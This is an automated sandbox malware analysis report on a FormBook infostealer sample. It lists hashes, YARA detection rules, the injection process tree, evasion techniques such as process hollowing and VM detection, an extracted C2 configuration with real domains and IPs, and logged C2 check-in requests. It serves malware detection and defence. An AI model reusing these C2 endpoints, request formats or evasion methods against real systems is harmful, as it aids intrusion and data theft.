Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report h8lD4SWL35.exe

Overview

General Information

Sample Name:h8lD4SWL35.exe
Analysis ID:374845
MD5:efd852e7f72a291cd15d8bcb8148c0fc
SHA1:6acae6aafbba672fa61931a833dd1c8819f6b47b
SHA256:0132bc0987f049d7527b99c657edefbf62eefcc9bdb4766e6066160ca0bdf4e2
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • h8lD4SWL35.exe (PID: 480 cmdline: 'C:\Users\user\Desktop\h8lD4SWL35.exe' MD5: EFD852E7F72A291CD15D8BCB8148C0FC)
    • h8lD4SWL35.exe (PID: 716 cmdline: 'C:\Users\user\Desktop\h8lD4SWL35.exe' MD5: EFD852E7F72A291CD15D8BCB8148C0FC)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5880 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 452 cmdline: /c del 'C:\Users\user\Desktop\h8lD4SWL35.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.h8lD4SWL35.exe.3150000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.h8lD4SWL35.exe.3150000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.h8lD4SWL35.exe.3150000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.h8lD4SWL35.exe.3150000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.h8lD4SWL35.exe.3150000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dllReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: h8lD4SWL35.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dllJoe Sandbox ML: detected
          Source: 0.2.h8lD4SWL35.exe.3150000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.msdt.exe.2dd5420.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.msdt.exe.5227960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.h8lD4SWL35.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.h8lD4SWL35.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: h8lD4SWL35.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msdt.pdbGCTL source: h8lD4SWL35.exe, 00000001.00000002.274487433.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: h8lD4SWL35.exe, 00000000.00000003.231736390.00000000031B0000.00000004.00000001.sdmp, h8lD4SWL35.exe, 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: h8lD4SWL35.exe, msdt.exe
          Source: Binary string: msdt.pdb source: h8lD4SWL35.exe, 00000001.00000002.274487433.00000000026B0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405CD4 FindFirstFileA,FindClose,0_2_00405CD4
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 4x nop then pop esi1_2_00415843
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 4x nop then pop ebx1_2_00406A95
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 4x nop then pop edi1_2_004162BB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 4x nop then pop edi1_2_00415675
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 4x nop then pop esi1_1_00415843
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi5_2_02A862BB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx5_2_02A76A95
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi5_2_02A85843
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi5_2_02A85675

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49695 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49695 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49695 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49698 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49698 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49698 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49699 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49699 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49699 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 213.32.49.255:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 213.32.49.255:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 213.32.49.255:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.856380692.xyz/nsag/
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.mecs.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=h6chZX6X/XLm5iLfNnjSQiLwIxpO4AXhRFvpVd8LzBeViFHgnZdEmcbaH/HW0orCWGB5 HTTP/1.1Host: www.thefamilyorchard.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=7cP8xnb8WyCvwLiClb+mYodtMUI7w/zEY/AqgyK4ue3XLBeWVzU6LHeJbcAyXLM59Zs/ HTTP/1.1Host: www.dccheavydutydiv.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.worldsourcecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=KrISVuELCs1q3UlzX6dLs0GN1f73ulMhv38PeKk8K2lo4f0Q4j/pm/FXRZPdylmCs2jx HTTP/1.1Host: www.icepolo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.explorerthecity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=Zdd+03lFPdaO8MwVGmYqRiw2DY9Wd51jzurMe9uohGYtv5+xzmK27QiPS7vk8ejd2SQP HTTP/1.1Host: www.winabeel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.alpinevalleytimeshares.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo HTTP/1.1Host: www.krishnagiri.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=UkBnU3nUIfYrxnxuiA7IQSHNtnWcHyh0bpM1KLOn6D8O+IO5Dhvu3uMtlrW7JTyKOcvi HTTP/1.1Host: www.profirma-nachfolge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=IhldT5wJOWXugkoAiz0IGMqIRU2spNDmcqQlMhwJn5b9F51tDlQqNKQjjCxGsZbl2k8T&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.meow-cafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=0fYIS8WhXSxnYSZx49570oVA3n8WHaW+EQaYVe4dO/i7L9H5e7C2DZIsfkO/ud7yRbP0 HTTP/1.1Host: www.xfixpros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.mecs.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.mecs.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=h6chZX6X/XLm5iLfNnjSQiLwIxpO4AXhRFvpVd8LzBeViFHgnZdEmcbaH/HW0orCWGB5 HTTP/1.1Host: www.thefamilyorchard.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=7cP8xnb8WyCvwLiClb+mYodtMUI7w/zEY/AqgyK4ue3XLBeWVzU6LHeJbcAyXLM59Zs/ HTTP/1.1Host: www.dccheavydutydiv.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.worldsourcecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=KrISVuELCs1q3UlzX6dLs0GN1f73ulMhv38PeKk8K2lo4f0Q4j/pm/FXRZPdylmCs2jx HTTP/1.1Host: www.icepolo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.explorerthecity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=Zdd+03lFPdaO8MwVGmYqRiw2DY9Wd51jzurMe9uohGYtv5+xzmK27QiPS7vk8ejd2SQP HTTP/1.1Host: www.winabeel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.alpinevalleytimeshares.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo HTTP/1.1Host: www.krishnagiri.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=UkBnU3nUIfYrxnxuiA7IQSHNtnWcHyh0bpM1KLOn6D8O+IO5Dhvu3uMtlrW7JTyKOcvi HTTP/1.1Host: www.profirma-nachfolge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=IhldT5wJOWXugkoAiz0IGMqIRU2spNDmcqQlMhwJn5b9F51tDlQqNKQjjCxGsZbl2k8T&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.meow-cafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?njndiL=9rtTFPBhfVt4&AjU=0fYIS8WhXSxnYSZx49570oVA3n8WHaW+EQaYVe4dO/i7L9H5e7C2DZIsfkO/ud7yRbP0 HTTP/1.1Host: www.xfixpros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1Host: www.mecs.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ithacapella.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Wed, 24 Mar 2021 08:19:47 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 